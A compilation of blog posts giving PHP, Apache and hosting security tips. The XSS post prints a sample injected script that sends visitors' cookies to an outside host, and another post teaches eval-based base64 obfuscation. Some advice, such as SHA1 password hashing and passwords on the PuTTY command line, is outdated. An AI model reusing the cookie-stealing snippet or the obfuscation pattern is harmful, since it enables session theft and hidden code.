Few know that those who have web hosting are at the same time endowed with a free VPN (Virtual Private Network, a very safe connection to transfer important data). With a few simple steps by the help of PuTTY, the tiny legendary SSH program, anyone with a web hosting account can have a private VPN that’s dedicated, premium and only limited by the monthly bandwidth of your hosting account. This is the safest VPN because it’s not even monitored by the VPN company. It’s completely YOURS.

Before proceeding, you need to make sure your hosting account has SSH enabled. Most hosts offer that nowadays.

What you will get?

You will have an awesome auto-login VPN program on your Windows desktop via SSH tunnels, based on PuTTY. Should get you the same thing on other systems following the same steps outlined below.

Double click to start the program, and a dedicated socks5 proxy will be established on your local computer which connects to your hosting server to form a VPN you can use.

How to get it?

To turn your web hosting account into a private VPN so you can use it to surf the web safely and anonymously, simply follow these steps:

1. Finish these steps: http://www.shanghaiwebhosting.com/web-hosting/use-your-web-hosting-ssh-session-as-a-tunnel-for-socks5-proxy-server
2. In step 4 at the above URL, you will save the session and give it a name, e.g. ‘my_server’.
3. Create a shortcut of this command: C:\tools\putty.exe -load my_server -l your_user_name -pw your_password

Make sure to use your own path to putty.exe rather than “C:\tools\putty.exe”.

The 3rd step is what makes all the difference – manual login or auto-login.

Without the 3rd step, you could still establish the VPN connection but you need to manually enter user name and password every time you start the SSH session. To make things simple, you want PuTTY to auto-login with pre-entered user name and password. That’s where the command line shortcut comes in.

The -load directive loads the saved session, -l specifies the SSH login user name, and -pw specifies the SSH password.

Double click, and that’s it!

Double click the shortcut and an SSH session window will be opened, PuTTY then automatically logs in with the user name and password you provided. If the auto-login is successful, a connection to your hosting server is established, thus VPN created.

Simply leave the session window open and configure your web browser to use ‘localhost’ as socks5 proxy on port ‘8844’ (you can specify a different port in Step 3 of this article), and you will be surfing the web safely and anonymously on a privately premium VPN!

Note that all your browsing traffic is counted on your web hosting’s monthly bandwidth bills. Think twice when you want to perform large downloads (such as 5GBs or larger) because they might end up being a bit costy.

Related Posts:

• Dismiss unusable proxy server lists – Build your own stable socks5 proxy server and surf anonymously in minutes!
• How to change CJ password? (of Commission Junction)
• How to Recover or Reset MySQL root Password after You Forgot and Lost It
• Shady GoDaddy: How to cancel private registration for your domain renewals?
• PayPal Account Access Limitation after Closing Browser Window and Opening It Again

The easy way to add a username and password pair in the .htpasswd file is to use an online password generator tool that converts the clear text password into its hash, a.k.a. the encrypted password. The problem with this approach is that you have to manually create the pair and append it to .htpasswd. Is there a way to dynamically generate encrypted passwords for .htpasswd in PHP?

According to http://httpd.apache.org/docs/2.2/misc/password_encryptions.html, we have come up with the following solution:

$pass = 'YourClearTextPasswordString';
$hash = base64_encode(sha1($pass, true));
$encoded = '{SHA}'.$hash;
echo $encoded;

And $encoded is the result we need, which would look something like:

{SHA}hNz9UE9WLiMlzYI+LRtwr0U+DHY=

Suppose the username is ‘manager’ and you can add the following line at the end of your .htpasswd file to make the credentials in effect:

manager:{SHA}hNz9UE9WLiMlzYI+LRtwr0U+DHY=

You can also write / append this to the file by PHP but that’s not covered here.

What’s better, the SHA1 algorithm is much more advanced than DES which most of the online .htpasswd generation tool still uses to generate the hash string of the clear password for you. DES supports only 8 digits and that’s where lengthy passwords fail.

Related Posts:

• The Secure Way to Store Passwords with PHP
• PHP: What is Hash? | Hashing a String | Generate Hash of Strings
• Just Hashing is Far from Enough for Storing Passwords – How to Position against Dictionary and Rainbow Table Attacks
• Essential SSH – 19 Linux SSH Commands You Simply Cannot Live Without
• Pair.com Hosting Coupons and Promo Codes (Bonus: Pair.com Control Panel Screenshots)

Sometimes you want the user to access something (a web page or a downloadable file) only by clicking a link on your own website instead of being able to directly access it by typing in the URL address in the browser address bar. This is achievable by a few lines in .htaccess.

RewriteEngine On
RewriteCond %{HTTP_REFERER} !(www.)?example.com/download-page.php
RewriteRule .* - [F]

Write down the above lines in the .htaccess of the directory that you want users to access only by clicking links on http://www.example.com/download-page.php or http://example.com/download-page.php. Direct access to download stuff from the directory or from any other HTTP referrer will fail.

While this may not be bullet proof as referral information can be faked from the client side, it is a simple solution that should suffice in most cases. For example, this can be used to prevent hot linking from other websites that link directly to something on your website, reducing traffic stealing.

Related Posts:

• PHP: How to detect / get the real client IP address of website visitors?
• .htaccess: Deny From All – Prohibit, Forbid or Restrict Directory Access
• How to hide and force the visitor to click your referral or affiliate link?
• Simplest PHP Hit Counter or Download Counter – Count the Number of Times of Access (Page Views or File Downloads)
• Turn off and disable magic_quotes_gpc in .htaccess

It’s not only insecure but it inconveniently commands the use of PHP function stripslashes() every time you pull something from the database or when you get something from the client side. While most of the hosts out there are using factory settings of PHP that turn off magic_quotes_gpc by default, there are a few that don’t.

The value of magic_quotes_gpc cannot be set with the ini_set() function after PHP 4.2.3, some hosts enable custom php.ini in your home directory which you can use to set magic_quotes_gpc to 0 (zero) or false. Otherwise, you’d have to resort to .htaccess to set the PHP configuration values for your local directories.

To turn off magic_quotes and magic_quotes_gpc off in .htaccess, simply put these lines in the .htaccess file of your site / directory wherein you want magic_quotes or magic_quotes_gpc disabled:

php_value magic_quotes 0
php_flag magic_quotes off
php_value magic_quotes_gpc 0
php_flag magic_quotes_gpc off

Related Posts:

• PHP: Display Files and Sub-directories of A Directory Recursively as A Tree
• .htaccess: Directory Listing – Enable Web Directory Browsing & Indexing
• .htaccess: Deny From All – Prohibit, Forbid or Restrict Directory Access
• How to get all the sub-directories of a given directory in PHP?
• PHP: Randomizing All Lines of a File – Shuffle Lines in a Text File

It’s not easy to become a great PHP developer which may very well take years of training and practice, but this doesn’t mean you shouldn’t do your best to not be a bad one that undermines every project he’s involved in. Based on the project experiences of my team and some recent researches done on PHP security issues, I have come up with a list of things you should know and do in your PHP code to achieve this goal. A few of them may be subjective and opinionated but most of them are actually security bottom lines that every self-deemed good PHP developer must definitely adhere to.

Below is a statistic breakdown of web security vulnerabilities in the first half of 2009, to give you a rough idea of what are the major security problems websites and web applications suffer:

You can download the full version in PDF prepared by Cenzic. It has some very interesting web attacks data.

There are a lot more to consider other than PHP to secure your application. This is just a starting point if you are not also a system administrator who is equally responsible in maintaining a secure server (OS, web server, etc.). Oh and there’s browser security (such as phishing) that you essentially have no control over. So we will just stick to PHP here.

php.ini

Some of the default settings in php.ini in earlier PHP versions are pretty dangerous. Modify the original php.ini if you are a server administrator or create custom php.ini in the webroot (directory of the web documents, accessible to the public via web server) to override the unsafe settings or use in-code functions such as ini_set():

1. Disable register_globals and don’t rely on it in your code:

   register_globals = Off

2. Disable magic quotes and don’t rely on it in your code:

   magic_quotes_gpc = Off

3. Disable error reporting:

   display_errors = Off

   This is for production deployment, otherwise achievable runtime by error_reporting(0). For development and debugging, make sure you turn on the full error reporting in your code by error_reporting(E_ALL) so that you get a full grip of what’s going on with your application.

4. Enable error logging and save the log file to a directory below webroot:

   log_errors = On
   ignore_repeated_errors = On
   html_errors = Off
   error_log = /path/below/webroot/logs/php_error_log

   Normally the errors will be displayed to the users / crackers when something goes wrong thus disclosing internal information about your application. Now that we have disallowed them to display publicly, enabling error logging helps capture all PHP errors and store them somewhere the users / crackers cannot access yet we can retrieve and analyze when necessary.

5. Store session data below webroot:

   session.save_path = /path/below/webroot/sessions

In most cases, you don’t have to worry about more than just the error logging part because the most up-to-date version of PHP has been well optimized in security by default. For example, register_globals and magic_quotes_gpc are turned off as factory settings, and session data is automatically stored outside of webroot. Other than these, feel free to override things by the ini_set() function when you feel obligated to.

Note that magic_quotes_gpc cannot be set by ini_set() any more after PHP version 4.2.3, you have to do it in a local php.ini or .htaccess.

.htaccess

Disable directory listing site wide by adding this line to the .htaccess file (hidden) placed in the document root of your domain:

Options -Indexes

And allow it in the specific directory where it is absolutely necessary and no files that are meant to be shown publicly are stored:

Options +Indexes

Valuable files and sensitive data

This includes member only materials, administrator stuff and site wide configuration files containing the vital data of your site, or whatever you feel uncomfortable exposed to the public. In fact, if you are having doubts whether some file is all right to be exposed, don’t expose it at all.

1. Store them below (outside) webroot so they cannot be retrieved by anyone via web server requests.
2. Hide the file path and use a PHP script to provide download of it.

Uploaded files

Compulsory security practices when handling uploaded files:

1. Validate the file name in $_FILES against potential data manipulation. For instance, discard anything that’s not alphanumeric or dot in the file name string.
2. Validate the mime type against potential spoof and discard anything that seems not what you expect.
3. After validation, change the file name and move it somewhere confidential below webroot. You can also optionally tar it for storing.
4. Never execute / serve uploaded files with include() nor require().
5. Never serve files with mime types of “application/octet-stream”, “application/unknown” nor “plain/text”.

Incoming requests

Cross Site Request Forgery (CSRF) Attacks: Just as the name suggests, the request is forged / fabricated from the authenticated user’s computer yet without his awareness and acknowledgement. For example, the malicious attacker creates a sneaky link (Clickjacking) or a form and manages to trick the legally logged user to use it to submit a hidden request to your application to perform something that he doesn’t authorize at all such as deletion. To prevent it:

1. Create a confirmation page for the legitimate user to make a final call by clicking ‘Yes’ or ‘No’. The request is then submitted to the server by POST method. Don’t just delete something (or perform other important operations) upon a simple GET request.
2. Generate a unique token (whatever name = value) in the user’s session and include it in every form as a hidden field so whenever the user submits a POST request, you can check if the form contains the correct token against that in the session variable to make sure if it is submitted by the user by true intentions.

Incoming / User provided data

Always filter or sanitize incoming data in $_GET, $_POST, $_COOKIE or $_REQUEST before using them in your code. Validate that a value is just what you expect and discard any characters suspicious / unneeded. Better yet, white list a few value prototypes by regular expressions and ignore anything that doesn’t match the criteria.

Path Traversal Attacks: By browsing through and trying different combinations of path input to your application, the cracker aims to access files and directories outside of the webroot, probably with a chain of ‘../’ in the path input. To prevent the attack:

1. Never use user input data directly in your code before it is sanitized or tested against the white list, especially when it is used to determine the subject of file open, include / require, file create and file delete operations.
2. Let users select indexes rather than the literal path string / file name. For example, open file “/home/test/whatever.txt” when “7” is selected by the user.
3. In fact, don’t give users the chance to make the call of which file / path to be used / included at all.
4. Don’t disclose your directory structure to the users in any way, for example, as a hidden field in the form.

SQL Injection Attacks: Exploits of secure vulnerabilities that occur in the database layer of an application wherein user input is not filtered for reserved characters that may cause the database to falsely interpret and execute the SQL query. To prevent this attack:

1. Escape a string value before using it as part of a SQL query:

   $mysqli -> real_escape_string($str)

   You can also use PDO to prepare the SQL queries, which will automatically sanitize any literal values by escaping it before using them in the query.

Cross-Site Scripting (XSS) Attacks: Or JavaScript injection, security vulnerabilities that allow malicious users to inject HTML code into your web pages that other users can view and execute. It can mess up the page, more fatally, it can load an arbitrary JavaScript script (hosted on another domain) in the user’s browser and steal their cookies thus identity. To prevent this attack:

1. Cookie should be set with the HttpOnly option enabled (true).
2. Escape anything and everything that goes live on a web page to be seen by your users:

   htmlentities($str)

Passwords

1. Optionally enforce strong passwords to your users by only accepting passwords of certain lengths and complexity.
2. Never store plain text passwords in your database. Instead, salt and hash the passwords. Bottom line is sha1(). Better yet, use hash() with various more advanced algorithms. Never use md5().
3. Optionally use pass phrases instead of passwords.

Sessions

1. Regenerate the session ID every time a user’s privileges are upgraded, for example, from visitor to registered member by logging in or from registered member to administrator by further logging in the administrator control panel:

   session_regenerate_id();

2. Completely destroy session variables (not just empty them) by:

   session_destroy();

3. Store IP address of initial authentication in session variables and compare request source IP every time you receive a request from the user. However, IP address can unexpectedly change during a legal session and can be a public proxy in the first place.

Cookies

1. When you need to wipe out some cookie variable, delete it from both the user’s browser AND your server:

   setcookie('SomeCookie', '', time() - 3600); // deletes it from client side
   unset($_COOKIE['SomeCookie']); // deletes it from server side

Other things to consider

1. All helper / utility scripts in your application that helps develop and debug should be removed from the production deployment. Only necessary files are to remain.
2. Never talk about your application structure or any other vital information regarding it as real examples in public places such as developer / server administrator discussion boards.
3. Maintain your own private PHP framework to employ these security practices in a general level. So you will not need to worry about the security particulars of all the projects that derive from this framework. Or use one of the popular PHP frameworks who have gone a long way in security and have been broadly tested by thousands of projects and billions of end users.
4. It’s not enough to just check and fix your code against these attacks. You have to assimilate these attack prevention tips into your daily coding arsenal and make them as natural as they must be done wherever they are needed. They have to become part of your blood and just feel right to you. Bobince makes a good point on this by asking for a PHP tutorial that preaches the right thing from the very beginning. For example, when you echo something with PHP to the output, even if you are an absolute beginner, it doesn’t absolve you from escaping them first:

   $str = 'Hi, I\'m on a web page.';
   echo htmlentities($str);

Please don’t hesitate to tip in by commenting below to make this security checklist as complete and useful as possible. To start a serious learning session of developing secure web applications, these books will provide a kickass ride for you.

Related Posts:

• PHP: setcookie() with HttpOnly Option to Reduce XSS (Cross Site Scripting) Attacks by Preventing JavaScript from Reading Cookies
• A few database security tips – things to do to effectively protect MySQL databases
• How to recover lost Firefox bookmarks? Where is my Firefox bookmarks folder?
• PHP: Change Error Reporting Level | Different PHP Error Types
• Web Application Security Books (PHP, MySQL, Apache), the Best at Amazon

Security may not make you but it sure can break you. As modern web applications become more and more complexed puzzles and filled with thousands of features catering to a spectrum of user preferences and tastes, the developers are burdened with ever-going responsibilities to keep them sound and safe. There are people (crackers) out there who are trying to make a name by breaking into your backyard or otherwise messing around in any way possible to make your day interesting. Your application or website is potentially vulnerable by simply being online. Everyone including innocent users can mess things up if yours is designed without security awareness. These books of web security are hand selected from Amazon that will get you a strong start on building secure websites applications and avoid being hacked. They are both new (published no more than 5 years ago) and well received (rated no less than 4/5 by the readers).

General Website / Web App Security

Web Security Testing Cookbook: Systematic Techniques to Find Problems Fast

The Web Application Hacker’s Handbook: Discovering and Exploiting Security Flaws

How to Break Web Software: Functional and Security Testing of Web Applications and Web Services

Foundations of Security: What Every Programmer Needs to Know (Expert’s Voice)

PHP Security

Essential PHP Security

Pro PHP Security

Apache Security

Apache Security

Database / MySQL Security

The Database Hacker’s Handbook: Defending Database Servers

MySQL Administrator’s Bible (Bible (Wiley))

Other Security Related Books

Ajax Security

Web Application Architecture: Principles, Protocols and Practices

HTTP: The Definitive Guide

To learn more about these specific areas and build better web applications, Amazon has the best PHP books, best MySQL books and best Apache Books.

Related Posts:

• Best Books of Apache Web Server to Learn Apache and Use It
• Best MySQL Books to Learn MySQL Database Programming and Development (+ PHP Applications)
• Best PHP Books for Learning PHP Development and Programming (with MySQL)
• Best and Newest HTML5 Books (and Some CSS3 Books)
• Best JavaScript Books for Learning JavaScript Programming and Development

It may considerably reduce XSS attack possibilities if not completely eradicate it. XSS, or Cross Site Scripting, is probably the most common security problems in web applications that engage in heavy user input. If you’ve ever tried to build a web application that users can input data in a lot of different venues, chances are it has a security hole somewhere that allows XSS attacks. Don’t panic though. Most web applications, even the most sophisticated ones developed by the best programmers such as vBulletin and WordPress release patches from time to time to fix XSS holes.

While it appears that XSS does no more than messing up the web pages in client’s browsers, it can be much much worse. XSS attacks make it possible for crackers to completely steal your identity (e.g. administrator account) on the website by planting a JavaScript file hosted somewhere else into your application pages. For instance, consider a malicious user who manages to put the following HTML code into the biography section of his user profile page on your application:

<script type=text/javascript src=http://1.2.3.4:8081/xss.js></script>

When you visit that page, without any knowledge of it at all, your browser automatically downloads and runs the script xss.js which contains a simple snippet:

window.location="http://1.2.3.4:8081/r.php?u="
+document.links[1].text
+"&l="+document.links[1]
+"&c="+document.cookie;

Via an HTTP GET request to the cracker’s server, the JS file successfully fetches and sends your cookie to the cracker. And the cookie is what your application solely relies on to recognize you as the administrator. Your identity is thus completely stolen by the cracker and he can now log into your application as the administrator. Horror story.

The first defense against XSS is to trust none of the user provided data and encode all incoming data into HTML entities before outputting them on the web pages. But that’s not enough. Unless you absolutely need JavaScript to be able to access cookies for your application, you are highly recommended to set the cookie to be accessible only via HTTP requests (from your own application server instead of user’s local browser). To do that, set the HttpOnly option of the PHP setcookie() function to be true:

setcookie("loggedin", 1, time() + 86400, "/admin/", "example.com", false, true); // the last (7th) parameter value true does the job

The last option value "true" effectively turns on the HttpOnly option and the cookie "loggedin" will ONLY be accessible to HTTP requests from the domain server and no JavaScript can read it any more. The HttpOnly parameter of the setcookie() function is only available in PHP 5.2.0 or later.

Related Posts:

• PHP cURL: Fetching URL and Sending Request with Cookies
• Using JavaScript to Open Excel and Word Files in HTML
• How to execute / run PHP code inside JavaScript files?
• How to recover lost Firefox bookmarks? Where is my Firefox bookmarks folder?
• How to include a JavaScript file inside a JavaScript file?

It goes without saying that sensitive information such as passwords or pass phrases should never be stored in plain text in the database in the first place. The common practice is to hash the user password and store the resulted hash string. When the user tries to log in and supplies his password, it is used to generate a hash string to be compared to the one stored in database. If they are identical, the password is matched and the user authenticated because the chance of 2 distinct strings having the same hash string is so low that it’s deemed mathematically impossible.

This approach may be secure in the 70s of the last century, but barely any more. Thanks to unprecedentedly cheap computing power now, rainbow tables, the mapping function from hash strings to any possible combinations of keyboard characters (alphanumeric, punctuations, etc.) have rendered this password storage / validation method insecure. With a mapping table of trillions of hash to cleartext pairs, it takes only 160 seconds to crack the password “Fgpyyih804423” which most of us would generally agree is fairly safe.

What can we do?

Provide a random salt when you are hashing the secret text. For instance with the PHP’s SHA1 hashing function:

$my_hash = sha1('whatever salt you put here would do,,,???'.$secret);

As you can see, the salt string can be whatever you like, in a random manner, prefixed and / or suffixed to the secret text before it is hashed into a hash string which will be stored. This way, because the cracker has no idea what the salt is, there’s no way he can create the right rainbow table to perform the crack. Even if he does, he would have to specifically build a rainbow table to crack your database which can be time-consuming. Subsequently, to make this even more difficult for the cracker, you can use different salts for each of the password entries in the database:

$salt = generate_random_salt(); // your in-house function that generates a random salt, perhaps by uniqid('some random string', true)
$my_hash = sha1($salt.$secret); // the $salt must then be stored in your database on a per entry base
// this function is the same as hash('sha1', $salt.$secret), but a better algorithm would be hash('whirlpool', $salt.$secret)

When the salt string is a per application constant, you can store it rather obscurely somewhere in your application code. However when you use random salt strings, you will have to store it correspondingly with the hash string $my_hash in the database, or otherwise you won’t be able to generate the correct hash string of the password user provides for authentication against the one stored in database.

It doesn’t even matter if the cracker gets the database and knows all the random salts, because he’d have to create and run through a huge rainbow table specific to each of the random salts to crack just one password. It’s so squarely and prohibitively time-consuming that he’d definitely give up.

A better yet approach to defend against rainbow or dictionary attacks is to be creative in generating the hash string – such as taking the username string into the generation and implementing multiple layers of hashing, in a playfully diversifying manner.

At last, it is recommended that you generate the initial hash string (the one to be stored in database) by running 1000 iterations of hashing instead of just 1. The extra computing burden on your server is negligible while it will increase the time needed to crack a single password by 1000 times at the cracker’s end. The point is to make the hashing process as slow as possible rather than the other way around. As the cracking usually makes password guesses and trial logins at a much higher paced speed, the slowness will have a much more detrimental effect on the cracker than on your website.

Related Posts:

• The Secure Way to Store Passwords with PHP
• PHP: What is Hash? | Hashing a String | Generate Hash of Strings
• How to create / generate .htpasswd password with PHP dynamically?
• MySQL: How to export a database / table to XML?
• How to Recover or Reset MySQL root Password after You Forgot and Lost It

To check if a URL or an email address is valid, the common solution is regular expressions. For instance, to validate an email address in PHP, I would use:

if (preg_match('|^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$|i', $email)) {
	// $email is valid
}

A simpler and more forgiving one would be:

|^\S+@\S+\.\S+$|

Which is usually quite enough for signup forms in preventing stupid typo errors. You get to validate the email by a validation link sent to the address anyway, as a final call whether the address is valid or not. For those who are obsessively curious, this may serve you well.

For URL, you can use this one:

|^\S+://\S+\.\S+.+$|

Or you can use one that is insanely detailed in addressing what a valid URL should be.

The filter_var() function of PHP5

What we are talking about here really is the filter_var() function of PHP5 that simplifies the URL and email validation by a large degree. To validate an email:

if (filter_var($email, FILTER_VALIDATE_EMAIL) !== false) {
	// $email contains a valid email
}

To validate a URL:

if (filter_var($url, FILTER_VALIDATE_URL) !== false) {
	// $url contains a valid URL
}

While filter_var() is meant to return the filtered results of the input according to the filter type specified, such as FILTER_VALIDATE_EMAIL or FILTER_VALIDATE_URL, you can generally use it to see if a valid email or a valid URL can be extracted from something. Better yet, filter and get the results first, use the result if it is good or abandon it when it is false:

$filtered_email = filter_var($email, FILTER_VALIDATE_EMAIL);
if ($filtered_email !== false) {
	// $filtered_email is the valid email got out of $email
} else {
	// nothing valid can be found in $email
}

Same applies to FILTER_VALIDATE_URL. Here’s a full list of filter types of filter_var() you can take advantage of.

Related Posts:

• Regular Expression for Date and Time Strings
• PHP: How to detect / get the real client IP address of website visitors?
• PHP: Check if a string contains another string or substring
• PHP: Allow Specific HTML Tags in Text Input Controls of HTML Forms, <textarea>, <input type=”text” />
• How to get all the sub-directories of a given directory in PHP?

Textarea and text input are common html form controls that accept text input. They can be a security challenge as they allow the user to enter anything they want. If you just go about using whatever data the user has entered, your application is anything but secure. Some sort of filtering / white-listing must be in place to protect the integrity of the application and you need to permit or allow only a few special HTML tags in the textarea control of the HTML forms.

The simplest way is to denounce any attempts to add HTML tags in the text box control is the PHP function strip_tags():

$all_tags_filtered = strip_tags($_POST['message']);

Wherein $_POST['message'] is the text just submitted by a user, containing all sorts of HTML tags. Thanks to the function strip_tags(), all the tags are now gone in $all_tags_filtered. The data in $all_tags_filtered is safe to use as it’s plain text.

However, there are times when you want to keep a few simple tags for the user’s convenience, such as <p>, <strong> and <em>. To do this, just feed a second parameter to the function strip_tags():

$some_tags_filtered = strip_tags($_POST['message'], '<p><strong><em>');

So <p> elements, <strong> elements and <em> elements are kept intact while all the other tags are gotten rid of in $some_tags_filtered.

One important thing to note is that strip_tags() does not check the attributes of the allowed HTML tags. The attributes of the allowed HTML elements such as style="" and onmouseover="" are kept as they are in the filtered results which may lead to other security problems. You have to use regular expressions to erase them out and block attached malicious attempts.

Related Posts:

• MySQL, PHP: Store form textarea value or data to MySQL database table
• PHP: Checkbox Array in Form Handling – Multiple Checkbox Values in an Array
• PHP: Generating Summary Abstract from A Text or HTML String, Limiting by Words or Sentences
• A Simple PHP Contact Form Script
• PHP: Prevent SQL Injection Attacks

I’d like to share with you some tips about hardening the database part of your application. Here are a few things you can do in protecting the databases from being compromised in security:

1. Create separate users with ONLY necessary privileges (as few as possible) to connect to the database for common daily tasks. Never use the database owner / creator or even MySQL root user in your PHP scripts to perform routine tasks.
2. Protect against SQL injection attacks by escaping ALL incoming input after ensuring data types with a variety of PHP variable type and character type validation functions.
3. The sprintf() function is both useful and secure in constructing SQL queries because of the built-in type checking. Better yet, use PDO.
4. Turn off error messages MySQL or PHP outputs when things go wrong so crackers know nothing about the technical details of your build such as database schema. As a matter of fact, a good rule of thumb in web application security is that the less people know about your application’s internal structure, the better.
5. For advanced SQL developers, extra abstraction layer in SQL in the form of stored procedures can benefit security because you implement yet another depth of defense and hide the schema of the database from the outside world.
6. For mission critical applications, it goes without saying that custom logging of database accesses can help a lot in identifying security risks.
7. If the database contains very sensitive data such as credit card information, you are strongly recommended to encrypt these tables or fields. Just use PHP cryptography extensions such as Mcrypt to encrypt any data that are to be stored and decrypt them when they are being retrieved.

Related Posts:

• MySQL: Get the exact size of a database by SQL query
• Web Application Security Books (PHP, MySQL, Apache), the Best at Amazon
• The Secure Way to Store Passwords with PHP
• MySQL: Select and Show all MySQL Users
• Best MySQL Books to Learn MySQL Database Programming and Development (+ PHP Applications)

This way is so simple that anyone who’s a beginner in PHP can use it immediately to obfuscate and hide the original PHP code. Generally, it’d make it much harder for someone to find a specific phrase in your code as it’s encrypted, though in a rather simple way using 4 PHP functions: gzinflate(), gzdeflate(), base64_encode() and base64_decode().

For example, you can make it eventually impossible for someone who know nothing about PHP or programming to modify your code and some of your native strings. It comes quite handy in encoding, obfuscating and protecting your credits lines in the footer of your scripts of web software.

Say here is the line of code you want to hide from being modified:

echo "You can't find me!"; // it’s “echo” instead of “echo”, same below. Have to post them this way because of a WP bug.

You can get the obfuscated and encrypted version of this line of code by:

echo base64_encode(gzdeflate('echo "You can\'t find me!";'));

Which would output:

S03OyFdQiswvVUhOzFMvUUjLzEtRyE1VVLIGAA==

This is the code you should use in your script. As it’s all encrypted and obfuscated, the original string and code are totally hidden, protecting them from being changed.

To run the hidden code, replace the original line of code with this one:

eval(gzinflate(base64_decode('S03OyFdQiswvVUhOzFMvUUjLzEtRyE1VVLIGAA==')));

It’s simply the reverse of the encoding plus an eval() function of PHP. And because all the original code and strings are totally encrypted in obfuscation, it’d be harder for non-programmers to modify your script but not professionals. For absolute protection of your code, use Zend Guard.

Related Posts:

• PHP: Convert between Numerical Bases | Binary Number, Decimal Number, Octal Number and Hexadecimal Number Conversions
• PHP: Hide the Real File URL and Provide Download via a PHP Script
• How to create / generate .htpasswd password with PHP dynamically?
• PHP: Store Array in File – Read / Write Arrays in File
• PHP: What is Hash? | Hashing a String | Generate Hash of Strings

The open_basedir directive in php.ini limits PHP file accesses (such as file opening, writing and deleting) within a designated directory such as /home/www/public_html so that it doesn’t endanger the rest of the system in any way. With proper Apache permissions and PHP installed as an Apache module, PHP inherits whatever privileges Apache has. As Apache is usually endowed with very limited permission in the form of a ‘nobody’ or ‘www-data’ group, there’s actually no need for open_basedir.

So it’s actually turned off by default. Controversies are raised about whether to use it or not. While it’s good to have extra confinement of what your public PHP scripts can access and do, it’d also make your applications reliable on it for file system security.

To modify the value of this directive and restrict php directory access, just find php.ini and locate the line:

;open_basedir =

And change it to minimum directory access your PHP applications need such as the web documents root:

open_basedir = '/home/www/public_html'

Related Posts:

• PHP: Change Current Working Directory
• .htaccess: Directory Listing – Enable Web Directory Browsing & Indexing
• PHP: Hide the Real File URL and Provide Download via a PHP Script
• PHP: Display Files and Sub-directories of A Directory Recursively as A Tree
• Use stat command to display file system meta information of any file or directory under Linux

Back when WordPress was pretty young there’s some loopholes that enable hackers to inject unauthorized and dangerous HTML code into your website pages, thus promoting the distribution of malware that damages the end users computer. I was once there and got penalized by Google for one of my sites. However, they are gentle enough to detect that this might not be my fault but still decided to bring down the overall ranking of all the pages on that site for a while to protect Internet users and notify me.

If you have spotted anything suspicious or sense that your overall site ranking is down, you may want to check it out for sure if your site has been infected with malware or anything else that’s a threat to your site and the visitors.

Just go here: http://www.google.com/safebrowsing/diagnostic?site=example.com

And Google will present you a detailed report of what they have found on your site for the last 90 days.

Related Posts:

• Google: Restrict matching results by searching only the anchor text, page title, page URL, page text or filetype
• What is wrong with ‘Supplemental result’?
• Auto-generated content by user searches
• Find the perfect page to build links on
• Web Hosting IP and SEO: Are You A Slum Dog or Are You A Millionaire?

phpBB is pretty much the best php forum software out there that is free, and comes the first choice of many webmasters. However, after a few weeks of first installation, many complain that spam bots start to overwhelm their forums, flooding with automated spam registrations and spam posts.

Unfortunately, that is generally because:

1. phpBB disables account activation by default so that any registered account would be instantly able to write and submit posts.
2. The default image captcha at registration is much too easy for anti-captcha programs to break.

So, taking phpBB 3.0.4 for an example, to prevent the majority of simple phpBB forum spam bots, with every new phpBB installation, you will:

1. Enable registration activation: Administration Control Panel => General => (Board Configuration) User registration settings => (General settings) Account activation => Now select ‘By User‘ from ‘None‘ => Submit.Thereby all new registered accounts will be required to validate the email address which no automated spam bots would do with fabricated ones, at least for not-so-valuable new forums.
2. Use harder captcha images: Administration Control Panel => General => (Board Configuration) Visual confirmation settings => (General options) => GD CAPTCHA foreground noise => Select ‘Yes‘ instead of ‘No‘ => Submit.This would make the captcha a lot harder to break but also less user friendly / accessible because the texts are also much harder for human recognizing. To ease the pain, you may want to set the numeric values just below the option for background noises of x-axis and y-axis higher or zero. I use 200.

After all these efforts you should be receiving much less spam now. If they still laugh at your defense and keep on coming, you should consider using more advanced image captcha such as reCaptcha.net.

For an idea of what captcha works best

Below is a list of famous Chinese websites image captchas that have allegedly been broken by automated text recognition programs with an accuracy percentage and price for each of them. From them you can get an idea of what captcha works the best and what can be easily worked around.

Origin	Samples	Accuracy	Price	Comments
9you		100%	500 $100	Very Easy
tiancity		100%	500 $100	Very Easy
cncard		100%	500 $100	Very Easy
the9		100%	500 $100	Very Easy
the9		99%	1000 $200	Easy
kingsoft		98%	1000 $200	Easy
taobao		95%	1000 $200	Easy
dvbbs		95%	1000 $200	Easy
126		95%	1000 $200	Easy
163		95%	1500 $300	Middle
shanda		90%	1500 $300	Middle
qq		90%	1500 $300	Middle
xiaonei		85%	1000 $200	Middle
sdo		85%	1500 $300	Middle
ourgame		80%	1500 $300	Middle
chinaren		85%	2000 $400	Middle
monter		80%	2000 $400	Middle
baidu		80%	$3000	Difficult
qq		75%	$3000	Difficult
ebay		60%	$4000	Difficult
myspace				30%
google				30%
hotmail				30%
yahoo				45% $8000

Related Posts:

• phpBB: Disabling User Registrations / Signup
• How to Enable / Change vBulletin Default Thread Subscription Mode for New User Registrations?
• How to change CJ password? (of Commission Junction)
• Pair.com Hosting Coupons and Promo Codes (Bonus: Pair.com Control Panel Screenshots)
• $6.99 .com domain coupon at GoDaddy for both registration and renewal